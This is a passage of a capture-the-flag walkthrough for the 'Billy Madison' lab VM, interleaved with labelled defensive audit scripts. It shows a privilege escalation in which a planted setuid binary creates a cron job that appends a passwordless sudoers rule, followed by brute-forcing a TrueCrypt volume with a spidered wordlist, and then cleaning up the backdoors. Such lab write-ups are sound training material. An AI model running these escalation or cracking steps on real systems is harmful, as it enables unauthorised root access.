1179709  40 -rwsr-xr-x   1 root     root        40152 May 26 18:31 /bin/mount
1179740  40 -rwsr-xr-x   1 root     root        40128 Mar 29 04:25 /bin/su
1179758  28 -rwsr-xr-x   1 root     root        27608 May 26 18:31 /bin/umount
1190647  32 -rwsr-xr-x   1 root     root        30800 Mar 11  2016 /bin/fusermount
1179724  44 -rwsr-xr-x   1 root     root        44680 May  7  2014 /bin/ping6
1179723  44 -rwsr-xr-x   1 root     root        44168 May  7  2014 /bin/ping
1190681 140 -rwsr-xr-x   1 root     root       142032 Feb 17  2016 /bin/ntfs-3g
```
Enemy spotted: /usr/local/share/sgml/donpcgd runs as root.
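From the defender's side of the same listing: as an added example (not part of the original walkthrough), a Python audit that parses `find -ls` output like the one above and flags what an administrator would want explained. The allowlist of package directories and the set of system groups are assumptions for a stock Ubuntu 16.04 box, and the sample lines are a subset of the output above.

```python
from dataclasses import dataclass

# Directories where setuid-root binaries are normally installed by packages.
# Assumed allowlist for a stock Ubuntu 16.04 install; anything outside it gets flagged.
EXPECTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")

# Groups that legitimately own root's setgid helpers on a stock system (assumed).
SYSTEM_GROUPS = {"root", "messagebus", "shadow", "utmp", "tty", "crontab", "ssh"}

# Sample input: a subset of the `find / -user root -perm -4000 -ls` output above.
FIND_LS_OUTPUT = """\
1454477 368 -r-sr-s--- 1 root eric 372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
1048829 136 -rwsr-xr-x 1 root root 136808 May 4 12:25 /usr/bin/sudo
1058216 24 -rwsr-xr-x 1 root root 23376 Jan 17 2016 /usr/bin/pkexec
1048745 56 -rwsr-xr-x 1 root root 54256 Mar 29 04:25 /usr/bin/passwd
1057498 40 -rwsr-xr-x 1 root root 38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
1066069 420 -rwsr-xr-x 1 root root 428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign
1056767 44 -rwsr-xr-- 1 root messagebus 42992 Apr 1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1179709 40 -rwsr-xr-x 1 root root 40152 May 26 18:31 /bin/mount
1179723 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
1190681 140 -rwsr-xr-x 1 root root 142032 Feb 17 2016 /bin/ntfs-3g
"""


@dataclass
class SuidEntry:
    perms: str   # ls-style mode string, e.g. "-rwsr-xr-x"
    owner: str
    group: str
    size: int
    path: str

    @property
    def setuid(self):
        # Owner execute slot shows 's' (or 'S' without exec) when setuid is set.
        return self.perms[3] in "sS"

    @property
    def setgid(self):
        # Group execute slot shows 's' (or 'S' without exec) when setgid is set.
        return self.perms[6] in "sS"


def parse_find_ls(text):
    """Parse `find -ls` lines: inode blocks perms links owner group size Mon DD time|year path.

    The path is the 11th field and may itself contain spaces, hence maxsplit=10.
    """
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(None, 10)
        if len(fields) != 11:
            raise ValueError(f"unexpected find -ls line: {line!r}")
        _inode, _blocks, perms, _links, owner, group, size, _mon, _day, _when, path = fields
        entries.append(SuidEntry(perms, owner, group, int(size), path))
    return entries


def audit(entries):
    """Return {path: [reasons]} for setuid-root files that look out of place.

    Two checks: a setuid-root binary living outside the package directories,
    and a setgid bit that hands root's helper to a group no system service uses.
    """
    findings = {}
    for e in entries:
        reasons = []
        if e.owner == "root" and e.setuid and not e.path.startswith(EXPECTED_DIRS):
            reasons.append("setuid-root binary outside package directories")
        if e.setgid and e.group not in SYSTEM_GROUPS:
            reasons.append(f"setgid to non-system group '{e.group}'")
        if reasons:
            findings[e.path] = reasons
    return findings


if __name__ == "__main__":
    for path, reasons in audit(parse_find_ls(FIND_LS_OUTPUT)).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

On the box above only donpcgd trips both checks; the dbus launch helper is group-restricted to messagebus but not setgid, so it passes.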
```
eric@BM:~$ /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2
```
I want to make Eric a sudoer. First I try to manipulate the crontab directly, as the documentation states, but I fail at that. So I pick cron.hourly and try to make an empty file there, which I will put a script in to edit /etc/sudoers.
```
eric@BM:/tmp$ touch elevate
eric@BM:/tmp$ /usr/local/share/sgml/donpcgd /tmp/elevate /etc/cron.hourly/pwn
#### mknod(/etc/cron.hourly/pwn,81b4,0)
eric@BM:/tmp$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/pwn
eric@BM:/tmp$ chmod +x /etc/cron.hourly/pwn
eric@BM:/tmp$ cat /etc/cron.hourly/pwn
#!/bin/bash
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
```
Now we wait a little. Play a game. Eat a cookie.
```
eric@BM:~$ sudo su
root@BM:/home/eric#
root@BM:/home/eric# id
uid=0(root) gid=0(root) groups=0(root)
```
B0w t0 me, f0r I am r00t!
# Cleaning up for Billy
In order to complete the VM we need to clean up Eric’s mess and find Billy’s paper. So I’m just gonna root through everything and see what pops up. First let’s look around for interesting stuff.
```
root@BM:~# ls -lah
total 92K
drwx------  8 root root 4.0K Sep 15 11:02 .
drwxr-xr-x 25 root root 4.0K Aug 30 01:15 ..
-rw-------  1 root root   26 Sep 15 11:01 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  3 root root 4.0K Aug 11 22:30 .cache
drwxr-xr-x  2 root root 4.0K Aug 22 21:24 checkban
-rwxr-xr-x  1 root root  112 Aug 21 22:11 cleanup.sh
-rwxr-xr-x  1 root root   59 Aug 21 22:12 ebd.sh
-rw-r--r--  1 root root   35 Aug 21 16:51 ebd.txt
-rwxr-xr-x  1 root root  102 Aug 20 12:45 email.sh
-rwxr-xr-x  1 root root   63 Aug 19 17:26 ftp.sh
-rwxr-xr-x  1 root root 1020 Aug 20 14:00 fwconfig.sh
drwx------  2 root root 4.0K Aug 21 15:58 .gnupg
drwxr-xr-x  3 root root 4.0K Aug 12 22:53 .m2
drwxr-xr-x  2 root root 4.0K Aug 11 22:17 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 15 10:16 .selected_editor
drwxr-xr-x  2 root root 4.0K Aug 22 21:19 ssh
-rwxr-xr-x  1 root root   33 Aug 11 22:51 ssh.sh
-rwxr-xr-x  1 root root   69 Aug 15 20:54 startup.sh
-rwxr-xr-x  1 root root  122 Aug 17 22:55 telnet.sh
-rw-r--r--  1 root root  222 Aug 20 21:58 .wget-hsts
-rwxr-xr-x  1 root root  230 Aug 16 17:08 wp.sh
```
The shell scripts here are partly legit and partly not, so it’s imperative to keep note of all the stuff Eric’s put in place.
In / we will find a folder called PRIVATE/
```
root@BM:/# ls -lah PRIVATE/
total 1.1M
drwx------  2 root  root  4.0K Aug 29 09:58 .
drwxr-xr-x 25 root  root  4.0K Aug 30 01:15 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   221 Aug 29 09:08 hint.txt
```
As with almost anything I find, I take a copy locally to Kali and check the file.
```
file BowelMovement
BowelMovement: data
```
BowelMovement looks promising but is not human-readable, an executable or a plain archive.
Let’s check out hint.txt
```
cat PRIVATE/hint.txt
Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up! LOLOLOL!

I always forget the password, but it's here: https://en.wikipedia.org/wiki/Billy_Madison

-EG
```
Yeah – OK. So we have a password-protected file. I’m taking a shot across the bow with it being a password-protected Office .doc/.docx, but no luck there. A hex editor is no good here. So maybe it’s an encrypted volume; I’m guessing VeraCrypt/TrueCrypt. First I need a wordlist (spidered with CeWL), then I can brute-force the file (with truecrack).
cewl --depth 0 -w billywiki.wls https://en.wikipedia.org/wiki/Billy_Madison CeWL 5.2 (Some Chaos) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/)
truecrack -w billywiki.wls -t BowelMovement TrueCrack v3.0 Website: http://code.google.com/p/truecrack Contact us: email@example.com Found password: "execrable" Password length: "10" Total computations: "604"
Now that I know it’s encryption is TrueCrypt have the password I mount the file with veracrypt
veracrypt -tc BowelMovement crypt Enter password for /root/hacking/BM/loot/root/BowelMovement: Enter keyfile [none]: Protect hidden volume (if any)? (y=Yes/n=No) [No]: -ls 1 16 drwx------ 3 root root 16384 Dec 31 1969 . 65 1 -rwx------ 1 root root 1000 Aug 21 10:22 ./secret.zip 66 1 drwx------ 2 root root 512 Aug 21 10:39 ./$RECYCLE.BIN 68 1 -rwx------ 1 root root 129 Aug 21 10:39 ./$RECYCLE.BIN/desktop.ini
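The reason the volume fell so fast is that the passphrase is a single word from a page the hint links to, and CeWL-style wordlists are built from exactly that. The following is an added example (not the write-up's tooling, and not CeWL itself) that reproduces the wordlist step in plain shell and checks whether a candidate passphrase appears in the list; the page text it reads is constructed, not the real Wikipedia article, and the `wordlist_from_html`, `passphrase_in_wordlist` and `check_passphrase` names are mine. It is the check to run against your own passphrase before trusting an encrypted volume whose "reminder" points at a public page.

```sh
#!/bin/sh
# CeWL-style wordlist check. Added example, not the write-up's own tooling:
# it builds a wordlist from a saved copy of a web page the way CeWL does
# (strip tags, split on non-letters, keep words of a minimum length, dedupe)
# and reports whether a candidate passphrase appears in it. The page text
# below is constructed, not the real Wikipedia article.

# Usage: wordlist_from_html <html-file> <min-length>   (prints one word per line)
wordlist_from_html() {
    sed 's/<[^>]*>/ /g' "$1" \
      | tr -cs '[:alpha:]' '\n' \
      | awk -v min="$2" 'length($0) >= min' \
      | sort -u
}

# Usage: passphrase_in_wordlist <passphrase> <wordlist-file>   (exit 0 if found)
passphrase_in_wordlist() {
    grep -qx -- "$1" "$2"
}

# Constructed stand-in for the hinted page.
PAGE=$(mktemp)
cat > "$PAGE" <<'EOF'
<html><body><h1>Billy Madison</h1>
<p>Billy Madison is a 1995 comedy film. One reviewer called the film
<i>execrable</i>; audiences were kinder. The film follows Billy, heir to
Madison Hotels, repeating grades one through twelve.</p></body></html>
EOF
WORDS=$(mktemp)
wordlist_from_html "$PAGE" 5 > "$WORDS"

# Prints "FOUND" or "not found" so a caller can check the verdict.
check_passphrase() {
    if passphrase_in_wordlist "$1" "$WORDS"; then echo FOUND; else echo "not found"; fi
}

check_passphrase execrable          # a single word lifted from the page falls at once
check_passphrase 'mr-shrimp-rules'  # not in the page's vocabulary
```

Minimum word length is the same knob CeWL exposes; dropping it to 3 or 4 grows the list quickly, which is exactly why a passphrase made of several unrelated words, rather than one word found near the hint, is what keeps a volume like this closed.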
After unpacking the zip file you'll find two documents: one is Billy's paper (congrats!) and the other is a note, THE-END.txt.
```
cat THE-END.txt
Congratulations!

If you're reading this, you win! I hope you had fun.

I had an absolute blast putting this together. I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (firstname.lastname@example.org) and let me know with the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us
```
And to top it off, I will not let the internet go without this shining example of the intellectual prowess of Billy Madison.
```
Billy Madison
Final Project
Knibb High

The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." The world was changing, and the puppy was getting... bigger. So, you see, the puppy was like industry. In that, they were both lost in the woods. And nobody, especially the little boy - "society" - knew where to find 'em. Except that the puppy was a dog. But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!

-BM
```
Cleaning up for Billy!
The objective stated that you have to undo the changes to recover Billy's project. Having taken the more direct approach and having r00t, I'll just go ahead and remove Eric's mess from this machine and leave it in a better state than I found it in. I'll state here that I backed up everything on separate storage in case anything needs to be analysed/recovered.
# Ernie knows it!
It might not constitute a change by Eric, but the system has been compromised so it's best to just reset all the passwords. Plus this will allow me to physically access the system.
```
echo -e "NEWPASS\nNEWPASS" | passwd USERNAME
```
# Get and remove elevation binary
```
root@BM:/usr/local/share/sgml# shred -zu donpcgd
```
# Check for crons and remove crons
```
root@BM:~# crontab -e
*/1 * * * * /root/ssh/canyoussh.sh
*/10 * * * * /root/telnet.sh
*/1 * * * * /root/checkban/checkban.sh
root@BM:~# rm /etc/cron.hourly/pwn
```
# Find the backdoor
```
root@BM:~# netstat -tulpn | grep 1974
```
# Stop remove backdoor
```
root@BM:~# service sshd stop
root@BM:~# update-rc.d -f sshd remove
root@BM:~# rm /root/ssh/canyoussh.sh
```
# Stop ssh only if you have access via other means. I have reset the root password
```
root@BM:~# service ssh stop
```
# Remove Eric’s shells.
```
root@BM:~# rm /root/checkban/checkban.sh
root@BM:~# rm ebd.sh
root@BM:~# rm telnet.sh        # funny telnet message for Billy
root@BM:~# nano startup.sh     # line removed from startup.sh:
/root/telnet.sh &
```
# Back-up and remove defaced website, set root access read-only to be safe
```
root@BM:~# cp -r /var/www/html/ /var/www/html_old
root@BM:~# rm -r /var/www/html/*
root@BM:~# chmod 400 -R /var/www/html_old/
root@BM:~# ls -lah /var/www/
total 16K
drwxr-xr-x  4 root root 4.0K Sep 29 19:24 .
drwxr-xr-x 14 root root 4.0K Aug 11 20:58 ..
drw-r-xr-x 10 root root 4.0K Sep 29 19:18 html
dr-S--S---  3 root root 4.0K Sep 29 19:20 html_old
```
# FTP knock should be changed
```
root@BM:~# nano /etc/knockd.conf
[FTP]
    sequence = 43,1337,1776,1945,2001,2016
```
# Fuck Eric
```
root@BM:~# userdel eric
```
# Remove eric from sudoers
```
root@BM:~# nano /etc/sudoers
#includedir /etc/sudoers.d
eric ALL=(ALL) NOPASSWD:ALL
```
# Remove Eric’s SMB share
```
root@BM:~# nano /etc/samba/smb.conf
[EricsSecretStuff]
    path = /home/WeaselLaugh
    guest ok = yes
    read only = yes
    writable = no
    public = yes
```
# Reboot to see how it comes back up
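The cleanup above is a manual walk through the usual persistence spots: cron, sudoers, Samba shares and listening sockets. Before rebooting, or on any similar box, the same checks can be run as a script against copies of the files so nothing is missed. The following is an added example, not part of the original write-up: the `suspicious_cron_entries`, `nopasswd_sudoers`, `guest_smb_shares` and `unexpected_listeners` functions are mine, and the sample inputs are constructed from the artefacts shown above (the three cron lines, Eric's sudoers rule, the `[EricsSecretStuff]` share) plus a made-up `netstat -tlnp` listing in which the PIDs are invented and the port 1974 listener is assumed to be the extra sshd the write-up found.

```sh
#!/bin/sh
# Persistence audit for a box like BM. Added example, not part of the original
# write-up: each function reads a copy of one file and prints the entries a
# responder should review; nothing is modified. The sample inputs below are
# constructed from the artefacts the write-up shows (cron lines, the sudoers
# rule, the Samba share) plus a made-up netstat listing; PIDs are invented.

# Cron entries that fire every minute or run a command out of /root, /tmp or /dev/shm.
suspicious_cron_entries() {
    grep -v '^[[:space:]]*#' "$1" | awk '
        $1 == "*" || $1 == "*/1" || $6 ~ "^/(root|tmp|dev/shm)/" { print }'
}

# sudoers rules that grant passwordless sudo.
nopasswd_sudoers() {
    grep -v '^[[:space:]]*#' "$1" | grep NOPASSWD
}

# Samba shares reachable without credentials ("guest ok = yes" or "public = yes").
guest_smb_shares() {
    awk '
        /^[ \t]*\[/ { share = $0; sub(/^[ \t]*\[/, "", share); sub(/\].*$/, "", share); next }
        tolower($0) ~ /^[ \t]*(guest ok|public)[ \t]*=[ \t]*yes/ {
            if (share != "" && !seen[share]++) print share
        }' "$1"
}

# Listening TCP sockets (netstat -tlnp or ss -tlnp output) whose port is not in
# the space-separated allowlist; prints "port pid/program".
unexpected_listeners() {
    awk -v allow=" $2 " '
        /LISTEN/ {
            n = split($4, a, ":"); port = a[n]
            if (index(allow, " " port " ") == 0) print port, $NF
        }' "$1"
}

# --- constructed sample inputs -------------------------------------------
WORK=$(mktemp -d)
cat > "$WORK/crontab" <<'EOF'
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/1 * * * * /root/ssh/canyoussh.sh
*/10 * * * * /root/telnet.sh
*/1 * * * * /root/checkban/checkban.sh
EOF
cat > "$WORK/sudoers" <<'EOF'
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
#includedir /etc/sudoers.d
eric ALL=(ALL) NOPASSWD:ALL
EOF
cat > "$WORK/smb.conf" <<'EOF'
[global]
   workgroup = WORKGROUP
[EricsSecretStuff]
   path = /home/WeaselLaugh
   guest ok = yes
   read only = yes
   writable = no
   public = yes
[printers]
   browseable = no
EOF
cat > "$WORK/netstat.txt" <<'EOF'
Proto Recv-Q Send-Q Local Address  Foreign Address State  PID/Program name
tcp        0      0 0.0.0.0:22     0.0.0.0:*       LISTEN 1124/sshd
tcp        0      0 0.0.0.0:80     0.0.0.0:*       LISTEN 1301/apache2
tcp        0      0 0.0.0.0:139    0.0.0.0:*       LISTEN 1288/smbd
tcp        0      0 0.0.0.0:445    0.0.0.0:*       LISTEN 1288/smbd
tcp        0      0 0.0.0.0:1974   0.0.0.0:*       LISTEN 1410/sshd
EOF

# Run every check and print a short report (expected services: ssh, web, smb).
run_audit() {
    echo "== cron entries to review ==";  suspicious_cron_entries "$WORK/crontab"
    echo "== passwordless sudo ==";       nopasswd_sudoers "$WORK/sudoers"
    echo "== guest-accessible shares =="; guest_smb_shares "$WORK/smb.conf"
    echo "== unexpected listeners ==";    unexpected_listeners "$WORK/netstat.txt" "22 80 139 445"
}
run_audit
```

On a live box you would point the functions at `/var/spool/cron/crontabs/root`, `/etc/sudoers` (plus `/etc/sudoers.d/*`), `/etc/samba/smb.conf` and the output of `netstat -tlnp`; running them again after the reboot is the same "looks good from the outside" check, done from the inside.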
After the reboot I check that I can only 'physically' access the machine and that none of Eric's 'services' are running.
```
Discovered open port 80/tcp on 192.168.1.16
Discovered open port 445/tcp on 192.168.1.16
Discovered open port 139/tcp on 192.168.1.16
```
Looks good from the outside.
Time to chill. Thanks Brian for the lulz!
I set out to brush up my skills a bit and this was labelled with a difficulty of Beginner/Moderate.
As someone who is somewhere in between, I felt it was a perfect fit; it indeed helped me progress in what I can do and how I can go about it.
I did feel a bit iffy about leaving the WordPress honeypot on there as I did not know if it belonged to Billy or Eric, so I disabled it but left it where it was.
Folders of interest: